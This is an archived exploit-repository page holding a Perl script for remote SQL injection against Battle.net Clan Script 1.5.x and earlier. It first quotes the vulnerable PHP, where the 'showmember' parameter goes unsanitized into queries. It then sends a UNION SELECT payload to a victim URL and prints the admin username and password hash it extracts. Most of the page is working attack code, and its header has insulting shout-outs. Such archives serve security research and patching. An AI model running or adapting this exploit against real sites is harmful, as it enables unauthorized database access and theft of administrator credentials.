what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

battlenet15x-sql.txt

battlenet15x-sql.txt
Posted May 12, 2008
Authored by Stack-Terrorist | Site v4-team.com

Battle.net Clan Script versions 1.5.x and below remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 1d3a77c80020182402035a4c39c4ceac4cb29b942f8f683ef598e4e7ab3fcf9f
Download | Favorite | View

battlenet15x-sql.txt

Change Mirror Download
#!/usr/bin/perl -w
# download script : http://sourceforge.net/project/showfiles.php?group_id=142506&package_id=156487
##############################################################
# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit   #
##############################################################
########################################
#[*] Founded by : Stack-Terrorist [v40]
#[*] Contact: Ev!L
#[*] Greetz : Houssamix & All muslims HaCkeRs  :)
#[*] Fuck   : JosS :@
########################################
# vulnerable page
########################################
#<div id="header"><h1><?php echo $site_name ?></h1></div>
#<div id="gutter"></div>
#<div id="col1">
# <?php showNav(); ?>#div>
#<div id="col2">
# <?php
# if(!isset($_GET['showmember']))
# { ?>
#  <h2>Members</h2>
#  <table id="members">
#   <tr>
#    <th>Rank</th>
#    <th>Member Name</th>
#    <th>Email</th>
#    <th>Date Joined</th>
#   </tr>
#   <?php#mysql_select_db($mysql_db) or die(mysql_error());
#   $sql = 'SELECT bcs_members.id, bcs_members.name, bcs_members.email, bcs_members.date, bcs_ranks.`order`, bcs_ranks.name AS rank '
#    . 'FROM bcs_members, bcs_ranks WHERE bcs_members.rank = bcs_ranks.id ORDER BY `order`, id';
#   $alt = 0;
#   $result = mysql_query($sql)  or die(mysql_error());
#   while($r=mysql_fetch_array($result))
#   {
#    $id=$r["id"];
#    $name=$r["name"];
#    $rank=$r["rank"];
##    $email=$r["email"];
 #   $recruit=$r["recruit"];
 #   $date=$r["date"];
 #   if($recruit === '') { $recruit = '&nbsp;'; }
 #   if ($alt % 2 == 0) { echo '<tr class="altrow">' . "\n"; }
 ##   else {  echo '<tr>' . "\n"; }
  #  echo '<td>' . $rank . '</td>' . "\n";
  #  echo '<td><a href="?page=members&showmember=' . $name . '">' . $name . '</a></td>' . "\n";
  ##  if($email === '') { echo '<td>n/a</td>' . "\n"; }
   # else { echo '<td><a href="mailto:' . $email . '">Email</a></td>' . "\n"; }
   # echo '<td>' . date("F d, Y", strtotime($date)) . '</td>' . "\n";
   # echo '</tr>' . "\n";
   # $alt = $alt + 1;
   #}
   #?>
  #</table>
# <?php
 #} // end of if $_GET
 #else
 #{?>
 # <h2>Member Details</h2>
 # <table id="members">
 #  <tr>
 #   <th>Rank</th>
 #   <th>Member Name</th>
 #   <th>Email</th>
  #  <th>Date Joined</th>
  # </tr>
  # <tr>
  # <?php
  # mysql_connect($mysql_host, $mysql_user, $mysql_pass) or die(mysql_error());
  # mysql_select_db($mysql_db) or die(mysql_error());
  # $sql = "SELECT `bcs_members`.`name`, `bcs_members`.`email`, `bcs_members`.`date`, `bcs_ranks`.`name` AS 'rank'"
  #  . "FROM `bcs_members`, `bcs_ranks` WHERE `bcs_members`.`rank` = `bcs_ranks`.`id` AND `bcs_members`.`name` = '" . $_GET['showmember'] . "'";
  # $result = mysql_query($sql)  or die(mysql_error());
  # $r=mysql_fetch_array($result);
  # echo '<td>' . $r["rank"] . '</td>' . "\n";
  # echo '<td>' . $r["name"] . '</td>' . "\n";
  # if($r["email"] === '') { echo '<td>n/a</td>' . "\n"; }
  # else { echo '<td><a href="mailto:' . $r["email"] . '">Email</a></td>' . "\n"; }
  # echo '<td>' . date("F d, Y", strtotime($r["date"])) . '</td>' . "\n";
  # ?>
  # </tr>
  #</table>
  #<br/>
  #<h2>Medals</h2>
  #<table id="members">
  # <tr>
  #  <th>Medal</th>
  #  <th>Medal Name</th>
  #  <th>Description</th>
  # </tr>
  # <tr>
  # <?php
  # $alt = 0;
  # $sql = 'SELECT `bcs_medals` . `path` , `bcs_medals` . `name` , `bcs_medals` . `description` '
  #  . ' FROM `bcs_medals` , `bcs_members` , `bcs_medal_list` '
   # . " WHERE `bcs_members` . `name` = '" . $_GET['showmember'] . "'"
   # . ' AND `bcs_medal_list` . `mem_id` = `bcs_members` . `id` '
  #  . ' AND `bcs_medal_list` . `medal` = `bcs_medals` . `id` ';
  # $result = mysql_query($sql)  or die(mysql_error());
  # while($r=mysql_fetch_array($result))
  # {
  #  $id=$r["id"];
   # $name=$r["name"];
   # $path=$r["path"];
   # $desc=$r["description"];
   # if ($alt % 2 == 0) { echo '<tr class="altrow">' . "\n"; }
   # else {  echo '<tr>' . "\n"; }
   # echo '<td class="center"><img src="' . $path . '" alt="' . $name . '"/></td>' . "\n";
   # echo "<td>" . $name . "</td>\n";
   # echo "<td>" . $desc . "</td>\n";
   # echo "</tr>\n";
   # $alt = $alt + 1;
   #}?>
#   </tr>
#  </table>
# <?php
#  echo "<br/>\n";
#  echo "<h2>Recruited</h2>\n";
#  $result = mysql_query("SELECT bcs_members.name FROM bcs_members, (SELECT id FROM bcs_members WHERE name = '" . $_GET['showmember'] . "') AS results "
#   . "WHERE results.id = bcs_members.recruit")  or die(mysql_error());
#  while($r=mysql_fetch_array($result))
#  {
#   echo $r["name"] . "<br/>\n";
#  }
# }
# ?>
#</div>
#<div id="footer"><?php echo $release; ?></div>*/
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
system("color a");
print "\t\t############################################################\n\n";
print "\t\t# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit #\n\n";
print "\t\t#                 by Stack-Terrorist [v40]                 #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
system("color f");
#the username of joomla
$user="name";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="bcs_members";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/?page=members&showmember=-1'%20union%20select%20".$pass.",user(),44,".$user."+from+".$tab."+where+id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<td>(.*?)<\/td>/){
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Admin User : $1";
}
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# exploit exploited by Stack-Terrorist
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close